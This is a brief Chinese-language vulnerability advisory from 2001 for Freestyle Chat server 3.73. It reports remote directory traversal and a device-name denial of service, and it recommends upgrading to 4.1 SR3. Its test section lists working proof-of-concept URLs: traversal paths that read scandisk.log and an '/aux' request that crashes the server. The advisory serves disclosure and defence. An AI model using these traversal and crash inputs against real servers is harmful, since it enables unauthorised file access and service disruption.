Freestyle Chat server 存在目录遍历问题发布时间:2001-05-26 更新时间:2001-05-26 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Freestyle Chat server 3.73详细描述 Freestyle Chat server是一个HTTP聊天环境,其中存在目录遍历漏洞,也存在设备名字类的拒绝服务攻击。 测试代码 http://www.server.com/.../.../scandisk.log http://www.server.com/..../scandisk.log 可以获取文件内容。 http://www.server.com/aux 造成拒绝服务攻击 解决方案 下载Freestyle Chat server 4.1 SR3版本。 相关信息 |
